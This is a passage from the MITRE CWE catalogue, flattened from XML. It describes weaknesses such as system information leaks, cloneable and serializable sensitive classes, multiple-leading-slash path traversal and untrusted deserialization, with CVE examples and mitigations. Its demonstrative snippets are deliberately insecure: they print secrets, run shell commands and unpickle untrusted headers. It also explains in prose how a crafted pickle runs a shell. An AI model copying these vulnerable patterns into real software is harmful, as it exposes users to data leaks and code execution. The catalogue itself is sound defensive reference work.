Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the product does. + Network-based products, such as web applications, often run on top of an operating system or similar environment. When the product communicates with outside parties, details about the underlying system are expected to remain hidden, such as path names for data files, other OS users, installed packages, the application environment, etc. This system information may be provided by the product itself, or buried within diagnostic or debugging messages. Debugging information helps an adversary learn about the system and form an attack plan. + An information exposure occurs when system data or debugging information leaves the program through an output stream or logging function that makes it accessible to unauthorized parties. Using other weaknesses, an attacker could cause errors to occur; the response to these errors can reveal detailed system information, along with other impacts. An attacker can use messages that reveal technologies, operating systems, and product versions to tune the attack against known vulnerabilities in these technologies. A product may use diagnostic methods that provide significant implementation details such as stack traces as part of its error handling mechanism. + + + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Implementation + Production applications should never use methods that generate internal details such as stack traces and error messages unless that information is directly committed to a log that is not viewable by the end user. All error message text should be HTML entity encoded before being written to the log file to protect against potential cross-site scripting attacks against the viewer of the logs + + + + + The following code prints the path environment variable to the standard error stream: + + char* path = getenv("PATH");...sprintf(stderr, "cannot find exe on path %s\n", path); + + + + This code prints all of the running processes belonging to the current user. + + + + //assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78) + $userName = getCurrentUser();$command = 'ps aux | grep ' . $userName;system($command); + + If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users. + + + The following code prints an exception to the standard error stream: + + try {...} catch (Exception e) {e.printStackTrace();} + + + try {...} catch (Exception e) {Console.Writeline(e);} + + Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program. + + + The following code constructs a database connection string, uses it to create a new connection to the database, and prints it to the console. + + string cs="database=northwind; server=mySQLServer...";SqlConnection conn=new SqlConnection(cs);...Console.Writeline(cs); + + Depending on the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system is vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program. + + + + + System Information Leak + + + ERR01-J + Do not allow exceptions to expose sensitive information + + + SFP23 + Exposed Data + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, References, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + System Information Leak + Information Leak of System Data + Exposure of System Data to an Unauthorized Control Sphere + + + + The code contains a class with sensitive data, but the class is cloneable. The data can then be accessed by cloning the class. + Cloneable classes are effectively open classes, since data cannot be hidden in them. Classes that do not explicitly deny cloning can be cloned by any other class without running the constructor. + + + + + + + + + + + + Implementation + + + Medium + + + Access Control + Bypass Protection Mechanism + A class that can be cloned can be produced without executing the constructor. This is dangerous since the constructor may perform security-related checks. By allowing the object to be cloned, those checks may be bypassed. + + + + + Implementation + If you do make your classes clonable, ensure that your clone method is final and throw super.clone(). + + + + + The following example demonstrates the weakness. + + public class CloneClient { + public CloneClient() //throwsjava.lang.CloneNotSupportedException { + + Teacher t1 = new Teacher("guddu","22,nagar road");//...// Do some stuff to remove the teacher.Teacher t2 = (Teacher)t1.clone();System.out.println(t2.name); + }public static void main(String args[]) { + + new CloneClient(); + } + }class Teacher implements Cloneable { + + public Object clone() { + + try {return super.clone();}catch (java.lang.CloneNotSupportedException e) { + + throw new RuntimeException(e.toString()); + } + }public String name;public String clas;public Teacher(String name,String clas) { + + this.name = name;this.clas = clas; + } + } + + Make classes uncloneable by defining a clone function like: + + public final void clone() throws java.lang.CloneNotSupportedException {throw new java.lang.CloneNotSupportedException();} + + + + + + Information leak through class cloning + + + OBJ07-J + Sensitive classes must not let themselves be copied + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak through Class Cloning + + + + The code contains a class with sensitive data, but the class does not explicitly deny serialization. The data can be accessed by serializing the class through another class. + Serializable classes are effectively open classes since data cannot be hidden in them. Classes that do not explicitly deny serialization can be serialized by any other class, which can then in turn use the data stored inside it. + + + + + + + + + + Implementation + + + High + + + Confidentiality + Read Application Data + an attacker can write out the class to a byte stream, then extract the important data from it. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + In Java, explicitly define final writeObject() to prevent serialization. This is the recommended solution. Define the writeObject() function to throw an exception explicitly denying serialization. + + + Implementation + Make sure to prevent serialization of your objects. + + + + + This code creates a new record for a medical patient: + + class PatientRecord {private String name;private String socialSecurityNum;public Patient(String name,String ssn) {this.SetName(name);this.SetSocialSecurityNumber(ssn);}} + + This object does not explicitly deny serialization, allowing an attacker to serialize an instance of this object and gain a patient's name and Social Security number even though those fields are private. + + + + + Information leak through serialization + + + SER03-J + Do not serialize unencrypted, sensitive data + + + SER05-J + Do not serialize instances of inner classes + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak through Serialization + + + + Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted. + + + + + + + + + Implementation + + + Operation + + + + + Confidentiality + Read Application Data + + + Integrity + Modify Application Data + + + + + System Configuration + The product configuration should ensure that SSL or an encryption mechanism of equivalent strength and vetted reputation is used for all access-controlled pages. + + + + + J2EE Misconfiguration: Insecure Transport + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + If an application uses SSL to guarantee confidential communication with client browsers, the application configuration should make it impossible to view any access controlled page without SSL. There are three common ways for SSL to be bypassed: + + A user manually enters URL and types "HTTP" rather than "HTTPS". + Attackers intentionally send a user to an insecure URL. + A programmer erroneously creates a relative link to a page in the application, which does not switch from HTTP to HTTPS. (This is particularly easy to do when the link moves between public and secured areas on a web site.) + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Misconfiguration: Insecure Transport + + + + The product accepts path input in the form of multiple leading slash ('//multiple/leading/slash') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + CVE-2002-1483 + Read files with full pathname using multiple internal slash. + https://www.cve.org/CVERecord?id=CVE-2002-1483 + + + CVE-1999-1456 + Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename. + https://www.cve.org/CVERecord?id=CVE-1999-1456 + + + CVE-2004-0578 + Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request. + https://www.cve.org/CVERecord?id=CVE-2004-0578 + + + CVE-2002-0275 + Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL. + https://www.cve.org/CVERecord?id=CVE-2002-0275 + + + CVE-2004-1032 + Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters. + https://www.cve.org/CVERecord?id=CVE-2004-1032 + + + CVE-2002-1238 + Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/. + https://www.cve.org/CVERecord?id=CVE-2002-1238 + + + CVE-2004-1878 + Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash). + https://www.cve.org/CVERecord?id=CVE-2004-1878 + + + CVE-2005-1365 + Server allows remote attackers to execute arbitrary commands via a URL with multiple leading "/" (slash) characters and ".." sequences. + https://www.cve.org/CVERecord?id=CVE-2005-1365 + + + CVE-2000-1050 + Access directory using multiple leading slash. + https://www.cve.org/CVERecord?id=CVE-2000-1050 + + + CVE-2001-1072 + Bypass access restrictions via multiple leading slash, which causes a regular expression to fail. + https://www.cve.org/CVERecord?id=CVE-2001-1072 + + + CVE-2004-0235 + Archive extracts to arbitrary files using multiple leading slash in filenames in the archive. + https://www.cve.org/CVERecord?id=CVE-2004-0235 + + + + + //multiple/leading/slash ('multiple leading slash') + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Multiple Leading Slash - //multiple/leading/slash + + + + An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways. + Public static variables can be read without an accessor and changed without a mutator by any classes in the application. + + + + + + + + + When a field is declared public but not final, the field can be read and written to by arbitrary Java code. + + + + Implementation + + + High + + + Integrity + Modify Application Data + The object could potentially be tampered with. + + + Confidentiality + Read Application Data + The object could potentially allow the object to be read. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Clearly identify the scope for all critical data elements, including whether they should be regarded as static. + + + Implementation + + Make any static fields private and constant. + A constant field is denoted by the keyword 'const' in C/C++ and ' final' in Java + + + + + + The following examples use of a public static String variable to contain the name of a property/configuration file for the application. + + class SomeAppClass { + + public:static string appPropertiesConfigFile = "app/properties.config"; + ... + } + + + public class SomeAppClass { + + public static String appPropertiesFile = "app/Application.properties";... + } + + Having a public static variable that is not marked final (constant) may allow the variable to the altered in a way not intended by the application. In this example the String variable can be modified to indicate a different on nonexistent properties file which could cause the application to crash or caused unexpected behavior. + + class SomeAppClass { + + public:static const string appPropertiesConfigFile = "app/properties.config"; + ... + } + + + public class SomeAppClass { + + public static final String appPropertiesFile = "app/Application.properties";... + } + + + + + + Overflow of static internal buffer + + + OBJ10-J + Do not use public static nonfinal variables + + + SFP28 + Unexpected access points + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-05 + Significant clarification of this entry, and improved examples. + + + CWE Content Team + MITRE + 2008-11-24 + updated Background_Details, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Overflow of Static Internal Buffer + Static Field Not Marked Final + + + + The product mixes trusted and untrusted data in the same data structure or structured message. + A trust boundary can be thought of as line drawn through a program. On one side of the line, data is untrusted. On the other side of the line, data is assumed to be trustworthy. The purpose of validation logic is to allow data to safely cross the trust boundary - to move from untrusted to trusted. A trust boundary violation occurs when a program blurs the line between what is trusted and what is untrusted. By combining trusted and untrusted data in the same data structure, it becomes easier for programmers to mistakenly trust unvalidated data. + + + + + + + + + Architecture and Design + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The following code accepts an HTTP request and stores the username parameter in the HTTP session object before checking to ensure that the user has been authenticated. + + usrname = request.getParameter("usrname");if (session.getAttribute(ATTR_USR) == null) {session.setAttribute(ATTR_USR, usrname);} + + + usrname = request.Item("usrname");if (session.Item(ATTR_USR) == null) {session.Add(ATTR_USR, usrname);} + + Without well-established and maintained trust boundaries, programmers will inevitably lose track of which pieces of data have been validated and which have not. This confusion will eventually allow some data to be used without first being validated. + + + + + Trust Boundary Violation + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Demonstrative_Example, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid. + + It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions if it does not use cryptography to protect itself. Furthermore, any cryptography would still be client-side security -- which is a dangerous security assumption. + Data that is untrusted can not be trusted to be well-formed. + When developers place no restrictions on "gadget chains," or series of instances and method invocations that can self-execute during the deserialization process (i.e., before the object is returned to the caller), it is sometimes possible for attackers to leverage them to perform unauthorized actions, like generating a shell. + + + + + + + + + + + + + + + + Serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred ("serialization"), then extracting the serialized data to reconstruct the original object ("deserialization"). + + + + Marshaling, Unmarshaling + Marshaling and unmarshaling are effectively synonyms for serialization and deserialization, respectively. + + + Pickling, Unpickling + In Python, the "pickle" functionality is used to perform serialization and deserialization. + + + PHP Object Injection + Some PHP application researchers use this term when attacking unsafe use of the unserialize() function; but it is also used for CWE-915. + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + Medium + + + Integrity + Modify Application Data + Unexpected State + Attackers can modify unexpected objects or data that was assumed to be safe from modification. + + + Availability + DoS: Resource Consumption (CPU) + If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate. + + + Other + Varies by Context + The consequences can vary widely, because it depends on which objects or methods are being deserialized, and how they are used. Making an assumption that the code in the deserialized object is valid is dangerous and can enable exploitation. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Implementation + If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified. + + + Implementation + When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe. + + + Implementation + Explicitly define a final object() to prevent deserialization. + + + Architecture and Design + Implementation + + Make fields transient to protect them from deserialization. + An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly. + + + + Implementation + Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation. + + + + + This code snippet deserializes an object from a file and uses it as a UI button: + + try {File file = new File("object.obj");ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));javax.swing.JButton button = (javax.swing.JButton) in.readObject();in.close();} + + This code does not attempt to verify the source or contents of the file before deserializing it. An attacker may be able to replace the intended file with a file that contains arbitrary malicious code which will be executed when the button is pressed. + To mitigate this, explicitly define final readObject() to prevent deserialization. An example of this is: + + private final void readObject(ObjectInputStream in) throws java.io.IOException {throw new java.io.IOException("Cannot be deserialized"); } + + + + In Python, the Pickle library handles the serialization and deserialization processes. In this example derived from [REF-467], the code receives and parses data, and afterwards tries to authenticate a user based on validating a token. + + try { + class ExampleProtocol(protocol.Protocol):def dataReceived(self, data): + # Code that would be here would parse the incoming data# After receiving headers, call confirmAuth() to authenticate + def confirmAuth(self, headers):try:token = cPickle.loads(base64.b64decode(headers['AuthToken']))if not check_hmac(token['signature'], token['data'], getSecretKey()):raise AuthFailself.secure_data = token['data']except:raise AuthFail + } + + Unfortunately, the code does not verify that the incoming data is legitimate. An attacker can construct a illegitimate, serialized object "AuthToken" that instantiates one of Python's subprocesses to execute arbitrary commands. For instance,the attacker could construct a pickle that leverages Python's subprocess module, which spawns new processes and includes a number of arguments for various uses. Since Pickle allows objects to define the process for how they should be unpickled, the attacker can direct the unpickle process to call Popen in the subprocess module and execute /bin/sh. + + + + + CVE-2019-12799 + chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183) + https://www.cve.org/CVERecord?id=CVE-2019-12799 + + + CVE-2015-8103 + Deserialization issue in commonly-used Java library allows remote execution. + https://www.cve.org/CVERecord?id=CVE-2015-8103 + + + CVE-2015-4852 + Deserialization issue in commonly-used Java library allows remote execution. + https://www.cve.org/CVERecord?id=CVE-2015-4852 + + + CVE-2013-1465 + Use of PHP unserialize function on untrusted input allows attacker to modify application configuration. + https://www.cve.org/CVERecord?id=CVE-2013-1465 + + + CVE-2012-3527 + Use of PHP unserialize function on untrusted input in content management system might allow code execution. + https://www.cve.org/CVERecord?id=CVE-2012-3527 + + + CVE-2012-0911 + Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value. + https://www.cve.org/CVERecord?id=CVE-2012-0911 + + + CVE-2012-0911 + Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution. + https://www.cve.org/CVERecord?id=CVE-2012-0911 + + + CVE-2011-2520 + Python script allows local users to execute code via pickled data. + https://www.cve.org/CVERecord?id=CVE-2011-2520 + + + CVE-2012-4406 + Unsafe deserialization using pickle in a Python script. + https://www.cve.org/CVERecord?id=CVE-2012-4406 + + + CVE-2003-0791 + Web browser allows execution of native methods via a crafted string to a JavaScript function that deserializes the string. + https://www.cve.org/CVERecord?id=CVE-2003-0791 + + + + + Deserialization of untrusted data + + + SER01-J + Do not deviate from the proper signatures of serialization methods + + + SER03-J + Do not serialize unencrypted, sensitive data + + + SER06-J + Make defensive copies of private mutable components during deserialization + + + SER08-J + Do not use the default serialized form for implementation defined invariants + + + SFP25 + Tainted input to variable + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + 